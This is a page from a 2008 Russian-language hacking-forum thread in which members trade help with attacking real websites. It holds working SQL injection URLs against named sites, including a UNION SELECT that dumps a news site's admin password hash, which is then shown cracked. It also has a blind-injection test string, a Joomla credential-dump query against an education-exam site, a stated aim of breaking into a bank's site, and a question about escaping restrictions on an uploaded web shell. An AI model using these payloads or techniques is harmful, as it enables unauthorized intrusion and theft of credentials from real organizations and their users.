HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
Перезагрузить страницу Ваши вопросы по уязвимостям.
   
 
Страница 232 из 1393 « Первая < 132182222 228 229 230 231 232 233 234 235 236 2422823327321232 > Последняя »
 
Опции темы Поиск в этой теме Опции просмотра

  #2311  
Старый 12.06.2008, 22:23
Jokester
Members of Antichat - Level 5
Регистрация: 18.02.2008
Сообщений: 1,136
Провел на форуме:
17621293

Репутация: 4915


По умолчанию
2 sabe
Цитата:
Сообщение от sabe  
уверен что это скуль..?)
 

  #2312  
Старый 12.06.2008, 22:27
MaZaHaKer
Участник форума
Регистрация: 19.01.2008
Сообщений: 111
Провел на форуме:
769380

Репутация: 73
По умолчанию
Цитата:
Сообщение от sabe  
это Оракл?

как реализовать?)
никак
 

  #2313  
Старый 12.06.2008, 22:39
sabe
Постоянный
Регистрация: 16.03.2007
Сообщений: 380
Провел на форуме:
1404552

Репутация: 568
Отправить сообщение для sabe с помощью ICQ Отправить сообщение для sabe с помощью AIM Отправить сообщение для sabe с помощью Yahoo
По умолчанию
спс..) а то я думаю... банк все же))))))
 

  #2314  
Старый 13.06.2008, 02:37
Велемир
Banned
Регистрация: 19.06.2006
Сообщений: 1,239
Провел на форуме:
1469161

Репутация: 142


Отправить сообщение для Велемир с помощью ICQ
По умолчанию
Цитата:
Сообщение от jokester  
Велемир
какие подзапросы?
_http://www.a2k.org.ua/news.php?id=-1978+UNION+SELECT+1,2,3,4,VERSION(),password,user, 8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,2 5,26,27,28%20,29,30,31,32,33,34,35,36,37,38+from+u sers--
4.1.22-standard
d23d8b79f575bcc0eedfb8c4e2f13540
admin
Кстати незамысловатый пасс
admin:repz
Да сломать то я его уже давно сломал,меня интересует не это.Есть банковский сайт на 4-ой версии,а до сих пор не научилсо работатьс подзапросами нормально =)),ибо там нужно знать,правильно ли ты подобрал таблицу или нет(вывода нету там).Не вслепую же всё подбирать ? Там ничего не выводится и мне нужно знать, как точно определить существование таблицы с юзерами к примеру,чтобы потом спокойно быть уверенным в том,что я правильно подбираю поля к ней.Этот сайт я привёл просто в качестве примера.

ЗЫ: А пароль меня жосско порадовал,когда hashcracking.info помучил гг)
 

  #2315  
Старый 13.06.2008, 02:46
Dima-k17
Познающий
Регистрация: 15.09.2005
Сообщений: 60
Провел на форуме:
254802

Репутация: 52
Отправить сообщение для Dima-k17 с помощью ICQ
По умолчанию
Дык а трабла то в чем?
Код:
http://www.a2k.org.ua/news.php?id=-1978+or+ascii(substring((SELECT%201),1,1))=49/*
 

  #2316  
Старый 13.06.2008, 03:00
sakh_rider
Новичок
Регистрация: 23.08.2007
Сообщений: 8
Провел на форуме:
49296

Репутация: 2
По умолчанию
Доброго времени суток.
Третий час уже пытаюсь узнать в чем дело:
SQL иньекция на лицо.
Составляю запрос
Код:
http://www1.ege.edu.ru/administrator/components/com_astatspro/refer.php?id=-1/**/union/**/select/**/1,concat(admin,0x3a,password,0x3a,usertype),concat(admin,0x3a,password,0x3a,SuperAdministrator)/**/from/**/jos_users/*
Но в ответ пишет:
Код:
Error number: 1064
You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near '/* AND typ = 'hyperlink'' at line 3 
Script stopped.
Может кто знает в чем дело?
 

  #2317  
Старый 13.06.2008, 03:51
n0ne
Постоянный
Регистрация: 01.01.2007
Сообщений: 796
Провел на форуме:
2693408

Репутация: 861


По умолчанию
sakh_rider, дело в том что ты не знаешь что такое sql-inj и как оно работает.

По теме - фильтруеца "/*"
 

  #2318  
Старый 13.06.2008, 04:42
sakh_rider
Новичок
Регистрация: 23.08.2007
Сообщений: 8
Провел на форуме:
49296

Репутация: 2
По умолчанию
Цитата:
Сообщение от n0ne  
sakh_rider, дело в том что ты не знаешь что такое sql-inj и как оно работает.

По теме - фильтруеца "/*"
Да знаю йа что такое sql injection, да и как работают тоже ... Уже были сайты, в которых получалось...
Вот просто множество запросов перепробовал, а вылазит одно и тоже именно на етом сайте

"+" тож пробовал(
Последний раз редактировалось sakh_rider; 13.06.2008 в 05:08..
 

  #2319  
Старый 13.06.2008, 06:19
sakh_rider
Новичок
Регистрация: 23.08.2007
Сообщений: 8
Провел на форуме:
49296

Репутация: 2
По умолчанию
Блин, столько времени и все зря...
SELECT command denied to user 'ege'@'pro.iot.ru' for table 'users'
 

  #2320  
Старый 13.06.2008, 12:55
Lancellot
Участник форума
Регистрация: 09.08.2006
Сообщений: 157
Провел на форуме:
1583810

Репутация: 56
По умолчанию
ку !
есть трабла имеется сайт на который удалось залить шелл в определенную диру но в ней отключены команды систем() ексек() итд но разришена include !
Вопрос возможно ли сделать так чтобы при инклуде шелла обойти эту диру и заинклудить его на директорию выше?
example:
/сс/сммммс/123/_залит_файл_с функц_инклуд/ возможно ли заинклудить в папку /123/??
 
 
Страница 232 из 1393 « Первая < 132182222 228 229 230 231 232 233 234 235 236 2422823327321232 > Последняя »



« Предыдущая тема | Следующая тема »
Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ